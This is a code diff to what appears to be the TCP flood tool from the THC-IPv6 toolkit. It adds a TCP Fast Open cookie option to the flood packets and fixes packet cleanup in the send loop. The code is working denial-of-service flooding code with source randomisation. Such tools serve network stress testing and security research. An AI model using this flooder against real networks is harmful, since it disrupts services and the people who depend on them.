@@ -11,7 +11,7 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2014 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2015 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s [-AcDrRS] [-m dstmac] [-p port] [-s sourceip6] interface target port\n\n", prg);
   printf("Options:\n");
   printf(" -a      add hop-by-hop header with router alert\n");
@@ -21,6 +21,7 @@ void help(char *prg) {
   printf(" -r      randomize the source from your /64 prefix\n");
   printf(" -R      randomize the source fully\n");
   printf(" -D      randomize the destination (treat as /64)\n");
+  printf(" -O      add a TCP Fast Open cookie (SYN-only packets)\n");
   printf(" -m dstmac     use this destination mac address\n");
   printf(" -s sourceip6  use this as source IPv6 address\n");
   printf(" -p port       use fixed source port\n");
@@ -31,9 +32,9 @@ void help(char *prg) {
 #define IDS_STRING 0xbebacefa
 
 int main(int argc, char *argv[]) {
-  char *interface, *ptr, buf2[8];
+  char *interface, *ptr, buf2[8], buf3[18];
   unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL, dmac[6];
-  int i, type = TCP_SYN, alert = 0, randsrc = 0, randdst = 0, randsrcp = 1, randdstp = 0, dont_crc = 0, seq, do_dst = 0;
+  int i, type = TCP_SYN, alert = 0, randsrc = 0, randdst = 0, randsrcp = 1, randdstp = 0, dont_crc = 0, seq, do_dst = 0, fastopen = 0, olen = 0;
   unsigned char *pkt = NULL;
   int pkt_len = 0, count = 0;
   unsigned short int sport, port;
@@ -45,11 +46,14 @@ int main(int argc, char *argv[]) {
   setvbuf(stdout, NULL, _IONBF, 0);
   setvbuf(stderr, NULL, _IONBF, 0);
   
-   while ((i = getopt(argc, argv, "aAcrRsDSp:m:d")) >= 0) {
+   while ((i = getopt(argc, argv, "aAcrRsDSp:m:dO")) >= 0) {
      switch(i) {
        case 'a':
          alert = 8;
          break;
+       case 'O':
+         fastopen = 1;
+         break;
        case 'A':
          type = TCP_ACK;
          break;
@@ -129,6 +133,13 @@ int main(int argc, char *argv[]) {
   buf2[0] = 5;
   buf2[1] = 2;
 
+  if (fastopen) {
+    buf3[0] = 22;
+    buf3[1] = 18;
+    memcpy(buf3 + 2, dst, 16);
+    olen = 18;
+  }
+
   printf("Starting to flood target network with TCP%s%s %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", (type & TCP_SYN) > 0 ? "-SYN" : "", (type & TCP_ACK) > 0 ? "-ACK" : "", interface);
   while (1) {
 
@@ -160,7 +171,7 @@ int main(int argc, char *argv[]) {
         if (thc_add_hdr_dst(pkt, &pkt_len, buf2, 6) < 0)
           return -1;
     }
-    if (thc_add_tcp(pkt, &pkt_len, sport, port, seq, 0, type, 0x3840, 0, NULL, 0, NULL, 0) < 0)
+    if (thc_add_tcp(pkt, &pkt_len, sport, port, seq, 0, type, 0x3840, 0, buf3, olen, NULL, 0) < 0)
       return -1;
     if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
       return -1;
@@ -168,6 +179,8 @@ int main(int argc, char *argv[]) {
     while (thc_send_pkt(interface, pkt, &pkt_len) < 0)
       usleep(1);
 
+    pkt = thc_destroy_packet(pkt);
+
     count++;
     if (count % 1000 == 0)
       printf(".");
